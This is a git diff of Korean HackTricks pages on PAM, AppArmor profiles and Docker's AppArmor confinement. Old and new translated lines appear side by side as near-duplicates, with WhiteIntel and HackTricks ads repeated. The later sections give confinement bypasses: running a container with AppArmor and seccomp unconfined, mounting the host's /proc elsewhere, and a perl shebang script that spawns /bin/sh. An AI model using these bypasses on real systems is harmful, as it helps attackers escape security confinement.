WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로** 사용해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -309,7 +309,7 @@ HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 팔로우하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우하세요.**
* **해킹 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 깃헙 저장소에 PR을 제출하세요.
</details>

View file

@ -4,7 +4,7 @@
HackTricks를 지원하는 다른 방법:
- **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
@ -12,15 +12,15 @@ HackTricks를 지원하는 다른 방법:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로**해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로**해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -28,14 +28,14 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
## 기본 정보
**PAM (Pluggable Authentication Modules)**은 **컴퓨터 서비스에 액세스하려는 사용자의 신원을 확인**하고, 다양한 기준에 따라 그들의 액세스를 제어하는 보안 메커니즘으로 작동합니다. 이는 특정 서비스와 상호 작용할 수 있는 권한이 있는 사용자만이 시스템 오버로드를 방지하고 사용량을 제한할 수 있도록 하는 디지털 관리자와 유사합니다.
**PAM (Pluggable Authentication Modules)**은 **컴퓨터 서비스에 액세스하려는 사용자의 신원을 확인**하고, 다양한 기준에 따라 액세스를 제어하는 보안 메커니즘으로 작동합니다. 이는 특정 서비스에만 인가된 사용자만 특정 서비스와 상호 작용할 수 있도록 보장하고, 잠재적으로 시스템 과부하를 방지하기 위해 사용량을 제한하는 디지털 관리자와 유사합니다.
### 구성 파일
- **Solaris 및 UNIX 기반 시스템**은 일반적으로 `/etc/pam.conf`에 위치한 중앙 구성 파일을 사용합니다.
- **Linux 시스템**은 서비스별 구성을 저장하기 위해 디렉토리 접근 방식을 선호하며, 예를 들어 로그인 서비스의 구성 파일은 `/etc/pam.d/login`에서 찾을 수 있습니다.
- **Linux 시스템**은 디렉토리 접근 방식을 선호하며, 서비스별 구성을 `/etc/pam.d`에 저장합니다. 예를 들어, 로그인 서비스의 구성 파일은 `/etc/pam.d/login`에서 찾을 수 있습니다.
로그인 서비스를 위한 PAM 구성 예시는 다음과 같을 수 있습니다:
로그인 서비스를 위한 PAM 구성 예시는 다음과 같습니다:
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
@ -52,7 +52,7 @@ session required /lib/security/pam_unix_session.so
이러한 영역 또는 관리 그룹에는 **auth**, **account**, **password**, **session**이 포함되어 있으며 각각 인증 및 세션 관리 프로세스의 다른 측면을 담당합니다:
- **Auth**: 종종 암호를 요청하여 사용자 식별을 유효화합니다.
- **Auth**: 종종 암호를 요청함으로써 사용자 식별을 유효성 검사합니다.
- **Account**: 그룹 멤버십 또는 시간 제한과 같은 조건을 확인하여 계정 확인을 처리합니다.
- **Password**: 복잡성 확인 또는 사전 공격 방지를 포함한 암호 업데이트를 관리합니다.
- **Session**: 디렉토리 마운트 또는 리소스 제한 설정과 같은 서비스 세션의 시작 또는 종료 중 작업을 관리합니다.
@ -68,19 +68,19 @@ session required /lib/security/pam_unix_session.so
### 예시 시나리오
여러 인증 모듈이 있는 설정에서 프로세스는 엄격한 순서를 따릅니다. `pam_securetty` 모듈이 로그인 터미널이 무단으로 사용되었다고 판단하면 루트 로그인이 차단되지만 "required" 상태 때문에 모든 모듈이 여전히 처리됩니다. `pam_env`는 환경 변수를 설정하여 사용자 경험을 개선할 수 있습니다. `pam_ldap``pam_unix` 모듈은 사용자를 인증하기 위해 함께 작동하며 `pam_unix`는 이전에 제공된 암호를 사용하려고 시도하여 인증 방법의 효율성과 유연성을 향상시킵니다.
여러 인증 모듈이 있는 설정에서 프로세스는 엄격한 순서를 따릅니다. `pam_securetty` 모듈이 로그인 터미널이 무단으로 사용되었다고 판단하면 루트 로그인이 차단되지만 "required" 상태 때문에 모든 모듈이 여전히 처리됩니다. `pam_env`는 환경 변수를 설정하여 사용자 경험을 개선할 수 있습니다. `pam_ldap``pam_unix` 모듈은 사용자를 인증하기 위해 함께 작동하며, `pam_unix`는 이전에 제공된 암호를 사용하려고 시도하여 인증 방법의 효율성과 유연성을 향상시킵니다.
## 참고 자료
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사 또는 그 고객이 **stealer malwares**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사 또는 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 대응하는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 대응하는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
@ -89,14 +89,14 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**로부터 AWS 해킹을 제로부터 전문가까지 배우세요!</strong></summary>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에 광고하거나 PDF로 다운로드하려면** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **HackTricks에서 회사를 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,23 +2,23 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **무료** 기능을 제공하여 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
@ -30,12 +30,12 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
## 기본 정보
AppArmor는 **프로그램별 프로필을 통해 프로그램에 제공되는 리소스를 제한하는 것을 목적으로 하는 커널 개선**으로, 사용자가 아닌 프로그램에 직접 액세스 제어 속성을 묶어 강제 액세스 제어(MAC)를 효과적으로 구현합니다. 이 시스템은 **프로필을 커널에 로드**하여 작동하며, 이러한 프로필은 프로그램이 액세스할 수 있는 리소스를 지시합니다. 네트워크 연결, raw 소켓 액세스 및 파일 권한과 같은 것들이 포함됩니다.
AppArmor는 **프로그램별 프로필을 통해 프로그램에 제공되는 리소스를 제한하는 커널 개선 기능**으로, 사용자가 아닌 프로그램에 직접 액세스 제어 속성을 묶어 강제 액세스 제어(MAC)를 효과적으로 구현합니다. 이 시스템은 **프로필을 커널에 로드**하여 작동하며, 이러한 프로필은 프로그램이 액세스할 수 있는 리소스를 지시합니다. 네트워크 연결, 원시 소켓 액세스 및 파일 권한과 같은 것들이 포함됩니다.
AppArmor 프로필에는 두 가지 운영 모드가 있습니다:
- **강제 모드**: 이 모드는 프로필 내에서 정의된 정책을 적극적으로 시행하여 이러한 정책을 위반하는 조치를 차단하고 syslog 또는 auditd와 같은 시스템을 통해 이러한 위반 시도를 기록합니다.
- **불평 모드**: 강제 모드와 달리 불평 모드는 프로필의 정책을 위반하는 조치를 차단하지 않습니다. 대신, 이러한 시도를 정책 위반으로 기록하고 제한을 시행하지 않습니다.
- **불평 모드**: 강제 모드와 달리 불평 모드는 프로필의 정책에 어긋나는 조치를 차단하지 않습니다. 대신, 이러한 시도를 정책 위반으로 기록하고 제한을 시행하지 않습니다.
### AppArmor 구성 요소
@ -47,7 +47,7 @@ AppArmor 프로필에는 두 가지 운영 모드가 있습니다:
### 프로필 경로
AppArmor 프로필은 일반적으로 _**/etc/apparmor.d/**_에 저장됩니다.\
`sudo aa-status`를 사용하여 일부 프로필에 제한이 있는 이진 파일을 나열할 수 있습니다. 각 나열된 이진 파일의 경로에서 "/" 문자를 점으로 변경하면 언급된 폴더 내의 apparmor 프로필 이름을 얻을 수 있습니다.
`sudo aa-status`를 사용하여 일부 프로필에 제한이 있는 이진 파일을 나열할 수 있습니다. 각 나열된 이진 파일의 경로에서 슬래시 "/"를 점으로 변경하면 언급된 폴더 내의 apparmor 프로필 이름을 얻을 수 있습니다.
예를 들어, _/usr/bin/man_에 대한 **apparmor** 프로필은 _/etc/apparmor.d/usr.bin.man_에 위치합니다.
@ -64,31 +64,31 @@ aa-mergeprof #used to merge the policies
## 프로필 생성
* 영향을 받는 실행 파일을 나타내기 위해 **절대 경로 및 와일드카드**가 허용됩니다 (파일 글로빙을 위해).
* **파일**에 대한 이진 파일의 액세스를 나타내기 위해 다음 **액세스 제어**를 사용할 수 있습니다:
* **파일**에 대한 **액세스 제어**를 나타내기 위해 다음 **액세스 제어**를 사용할 수 있습니다:
* **r** (읽기)
* **w** (쓰기)
* **m** (실행 가능한 메모리 맵)
* **m** (메모리 맵을 실행 파일로)
* **k** (파일 잠금)
* **l** (하드 링크 생성)
* **ix** (새 프로그램이 정책을 상속하여 다른 프로그램을 실행)
* **ix** (다른 프로그램을 새 프로그램에서 정책 상속하여 실행)
* **Px** (환경을 정리한 후 다른 프로필 하에서 실행)
* **Cx** (환경을 정리한 후 자식 프로필 하에서 실행)
* **Ux** (환경을 정리한 후 비제한적으로 실행)
* **변수**는 프로필에서 정의될 수 있으며 외부에서 조작할 수 있습니다. 예: @{PROC} 및 @{HOME} (프로필 파일에 #include \<tunables/global> 추가)
* **허용 규칙을 무시하 거부 규칙이 지원**됩니다.
* **허용 규칙을 무시하도록 거부 규칙이 지원**됩니다.
### aa-genprof
프로필 생성을 쉽게 시작하려면 apparmor를 사용할 수 있습니다. **이진 파일이 수행하는 작업을 apparmor가 검사한 다음 허용하거나 거부할 작업을 결정할 수 있습니다**.\
프로필 생성을 쉽게 시작하려면 apparmor를 사용할 수 있습니다. **바이너리가 수행하는 작업을 apparmor가 검사한 다음 허용 또는 거부할 작업을 결정하도록** 할 수 있습니다.\
다음을 실행하면 됩니다:
```bash
sudo aa-genprof /path/to/binary
```
런 다음, 다른 콘솔에서 일반적으로 실행되는 이진 파일이 수행하는 모든 작업을 수행하십시오:
, 다른 콘솔에서 일반적으로 실행되는 이진 파일이 수행하는 모든 작업을 수행하십시오:
```bash
/path/to/binary -a dosomething
```
그럼, 첫 번째 콘솔에서 "**s**"를 누르고 기록된 작에서 무시하거나 허용할지를 지정하십시오. 완료하면 "**f**"를 누르고 새 프로필이 _/etc/apparmor.d/path.to.binary_에 생성됩니다.
그럼 첫 번째 콘솔에서 "**s**"를 누르고 기록된 작에서 무시하거나 허용할지를 지정하십시오. 완료하면 "**f**"를 누르고 새 프로필이 _/etc/apparmor.d/path.to.binary_에 생성됩니다.
{% hint style="info" %}
화살표 키를 사용하여 허용/거부/기타를 선택할 수 있습니다.
@ -96,7 +96,7 @@ sudo aa-genprof /path/to/binary
### aa-easyprof
또한 이진 파일의 apparmor 프로필 템플릿을 만들 수 있습니다.
또한 이진 파일의 apparmor 프로필 템플릿을 생성할 수도 있습니다.
```bash
sudo aa-easyprof /path/to/binary
# vim:syntax=apparmor
@ -136,7 +136,7 @@ sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
sudo aa-logprof
```
{% hint style="info" %}
화살표 키를 사용하여 허용할지 거부할지 기타 작업을 선택할 수 있습니다.
화살표 키를 사용하여 허용할을 선택할 수 있습니다.
{% endhint %}
### 프로필 관리
@ -154,7 +154,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
```
당신은 다음을 사용하여 이 정보를 얻을 수도 있습니다:
다음을 사용하여이 정보를 얻을 수도 있습니다:
```bash
sudo aa-notify -s 1 -v
Profile: /bin/service_bin
@ -172,7 +172,7 @@ Logfile: /var/log/audit/audit.log
AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)
For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
## Docker에서 Apparmor
## 도커에서의 Apparmor
도커의 프로필 **docker-profile**이 기본적으로 로드되는 방법에 주목하세요:
```bash
@ -194,38 +194,38 @@ docker-default
**도커 기본 프로필 요약**:
- 모든 **네트워킹에 대한 액세스**
- **능력(capability)**이 정의되지 않음 (그러나 일부 능력은 기본 기본 규칙을 포함하여 제공됨 예: #include \<abstractions/base>)
- **/proc** 파일에 **쓰기가 허용되지 않음**
- 다른 /**proc** 및 /**sys**의 **하위 디렉토리/파일**은 읽기/쓰기/잠금/링크/실행 액세스가 **거부됨**
- **마운트가 허용되지 않음**
- **Ptrace**는 **동일한 apparmor 프로필로 제한된 프로세스에서만 실행**될 수 있음
- 모든 **네트워킹**에 **액세스**
- **능력**이 정의되지 않음 (그러나 일부 능력은 기본 베이스 규칙 포함으로 인해 제공됨 예: #include \<abstractions/base>)
- **/proc** 파일에 **쓰기****허용되지 않음**
- 다른 /**proc** 및 /**sys**의 **하위 디렉토리**/**파일**은 읽기/쓰기/잠금/링크/실행 액세스가 **거부됨**
- **마운트****허용되지 않음**
- **Ptrace**는 **동일한 apparmor 프로필**에 의해 제한된 프로세스에서만 실행될 수 있음
도커 컨테이너를 **실행**하면 다음 출력이 표시됩니다:
```bash
1 processes are in enforce mode.
docker-default (825)
```
**apparmor는 심지어 컨테이너에 부여된 권한(capabilities privileges)도 차단할 것**입니다. 예를 들어, **SYS_ADMIN 권한이 부여되더라도 /proc 내부에 쓰기 권한을 차단**할 수 있습니다. 왜냐하면 기본적으로 도커(apparmor) 프로필이 이 액세스를 거부하기 때문입니다:
참고로 **apparmor는 심지어 기본적으로 컨테이너에 부여된 권한(capabilities) 권한도 차단할 것**입니다. 예를 들어, **SYS_ADMIN 권한이 부여되더라도 /proc 내부에 쓰기 권한을 차단**할 수 있습니다. 이는 기본적으로 도커 apparmor 프로필이 이 액세스를 거부하기 때문입니다:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
echo "" > /proc/stat
sh: 1: cannot create /proc/stat: Permission denied
```
Apparmor 제한을 우회하려면 **apparmor를 비활성화**해야 합니다:
**Apparmor를 비활성화**하여 제한을 우회해야 합니다:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
기본적으로 **AppArmor**은 **컨테이너가 내부에서 폴더를 마운트하는 것을 금지**합니다.
기본적으로 **AppArmor**은 컨테이너가 SYS\_ADMIN 능력을 갖고 있더라도 내부에서 폴더를 마운트하는 것을 금지합니다.
도커 컨테이너에 **권한을 추가/제거**할 수 있습니다 (이는 여전히 **AppArmor** 및 **Seccomp**과 같은 보호 방법에 의해 제한될 것입니다):
도커 컨테이너에 **능력을 추가/제거**할 수 있음을 유의하십시오 (이는 **AppArmor** 및 **Seccomp**과 같은 보호 방법에 의해 여전히 제한될 것입니다):
- `--cap-add=SYS_ADMIN``SYS_ADMIN` 권한을 부여합니다.
- `--cap-add=ALL`은 모든 권한을 부여합니다.
- `--cap-drop=ALL --cap-add=SYS_PTRACE`은 모든 권한을 제거하고 `SYS_PTRACE`만 부여합니다.
* `--cap-add=SYS_ADMIN``SYS_ADMIN` 능력을 부여합니다.
* `--cap-add=ALL`은 모든 능력을 부여합니다.
* `--cap-drop=ALL --cap-add=SYS_PTRACE`는 모든 능력을 제거하고 `SYS_PTRACE`만 부여합니다.
{% hint style="info" %}
일반적으로 **도커 컨테이너 내에서 특권 권한**을 발견했지만 **일부 부분의 exploit이 작동하지 않는** 경우, 이는 도커 **AppArmor가 방지하고 있기 때문**일 수 있습니다.
일반적으로, **도커** 컨테이너 내에서 **특권 능력**을 발견했지만 **일부 부분의 exploit이 작동하지 않는 경우**, 이는 도커 **AppArmor가 방지하고 있기 때문**일 수 있습니다.
{% endhint %}
### 예시
@ -245,7 +245,7 @@ sudo apparmor_parser -r -W mydocker
$ sudo apparmor_status | grep mydocker
mydocker
```
다음과 같이 AppArmor 프로필이 "/etc/"에 쓰기 액세스를 방지하고 있기 때문에 "/etc/"를 변경하려고 시도할 때 오류가 발생합니다.
아래와 같이 AppArmor 프로필이 "/etc/"에 쓰기 액세스를 방지하고 있기 때문에 "/etc/"를 변경하려고 시도하면 오류가 발생합니다.
```
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
chmod: /etc/hostname: Permission denied
@ -264,11 +264,11 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
```
### AppArmor Docker Bypass2
**AppArmor은 경로를 기반으로 합니다**, 이는 **`/proc`** 디렉토리 내의 파일을 **보호**하고 있더라도 **컨테이너가 실행될 방법을 구성**할 수 있다면 호스트의 proc 디렉토리를 **`/host/proc`**에 마운트할 수 있으며 이는 더 이상 AppArmor에 의해 **보호되지 않을 것**입니다.
**AppArmor은 경로를 기반으로 합니다**, 이는 **`/proc`** 디렉토리 내의 파일을 **보호**하고 있더라도 **컨테이너가 실행될 방법을 구성**할 수 있다면 호스트의 proc 디렉토리를 **`/host/proc`**에 마운트할 수 있 이는 더 이상 AppArmor에 의해 **보호되지 않을 것**입니다.
### AppArmor Shebang Bypass
[**이 버그**](https://bugs.launchpad.net/apparmor/+bug/1911431)에서 **특정 리소스로 perl 실행을 방지하고 있더라도**, 첫 줄에 **`#!/usr/bin/perl`**을 지정한 쉘 스크립트를 만들고 해당 파일을 직접 **실행**하면 원하는 대로 실행할 수 있습니다. 예:
[**이 버그**](https://bugs.launchpad.net/apparmor/+bug/1911431)에서 **특정 리소스로 perl 실행을 방지하고 있더라도**, 첫 줄에 **`#!/usr/bin/perl`**을 지정한 쉘 스크립트를 만들고 해당 파일을 직접 실행한다면 원하는 대로 실행할 수 있습니다. 예:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -278,28 +278,28 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**에서 파워를 받아 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공하는 검색 엔진입니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**를 통해 제로부터 영웅이 되는 AWS 해킹을 배우세요</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)이나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** 트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,33 +2,33 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)</strong>에서 <strong>AWS 해킹을 처음부터 전문가까지 배우세요</strong>!</summary>
HackTricks를 지원하는 다른 방법:
다른 방법으로 HackTricks를 지원하는 방법:
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 해킹 요령을 공유하세요.
- **회사가 HackTricks에 광고되길 원하거나** **PDF로 HackTricks를 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
- **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
